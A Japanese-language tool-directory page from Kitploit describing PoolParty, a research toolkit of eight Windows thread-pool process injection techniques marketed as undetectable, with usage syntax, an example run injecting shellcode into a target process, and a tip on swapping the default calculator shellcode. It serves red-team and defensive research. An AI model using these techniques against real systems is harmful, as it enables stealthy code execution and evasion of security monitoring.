Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/safebreach-labs/poolparty
特権昇格エクスプロイトシェルコードポストエクスプロイトレッドチーミングペイロード開発
GitHubsafebreach-labs/poolparty

PoolParty

Windows スレッドプールを悪用した完全不可視のプロセスインジェクション技術群

リポジトリを見る
1.3k1792年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PoolParty

Windows スレッド プールを悪用する、完全に検出不可能なプロセスインジェクション手法のコレクションです。Black Hat EU 2023 Briefings で「あなたが決して忘れないプールパーティ:Windows スレッド プールを使用した新しいプロセスインジェクション手法」(https://www.blackhat.com/eu-23/briefings/schedule/#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446) というタイトルで発表されました。

PoolParty のバリエーション

バリアントIDバリアントの説明
1対象となるワーカーファクトリのスタートルーチンを上書き
2対象プロセスのスレッド プールに TP_WORK ワークアイテムを挿入
3対象プロセスのスレッド プールに TP_WAIT ワークアイテムを挿入
4対象プロセスのスレッド プールに TP_IO ワークアイテムを挿入
5対象プロセスのスレッド プールに TP_ALPC ワークアイテムを挿入
6対象プロセスのスレッド プールに TP_JOB ワークアイテムを挿入
7対象プロセスのスレッド プールに TP_DIRECT ワークアイテムを挿入
8対象プロセスのスレッド プールに TP_TIMER ワークアイテムを挿入

使用方法

root@kitploit:~
PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

使用例

プロセスID 1234 に TP_TIMER ワークアイテムを挿入

root@kitploit:~
>> PoolParty.exe -V 8 -P 1234

[info]    Starting PoolParty attack against process id: 1234
[info]    Retrieved handle to the target process: 00000000000000B8
[info]    Hijacked worker factory handle from the target process: 0000000000000058
[info]    Hijacked timer queue handle from the target process: 0000000000000054
[info]    Allocated shellcode memory in the target process: 00000281DBEF0000
[info]    Written shellcode to the target process
[info]    Retrieved target worker factory basic information
[info]    Created TP_TIMER structure associated with the shellcode
[info]    Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info]    Written the specially crafted TP_TIMER structure to the target process
[info]    Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info]    Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info]    PoolParty attack completed successfully

デフォルトのシェルコードとカスタマイズ

デフォルトのシェルコードは、WinExec API を介して電卓を起動します。

実行する実行ファイルをカスタマイズするには、main.cpp ファイル内にある g_Shellcode 変数の末尾のパスを変更してください。

作者 - Alon Leviev

  • LinkedIn - Alon Leviev
  • Twitter - @_0xDeku
ツールをダウンロード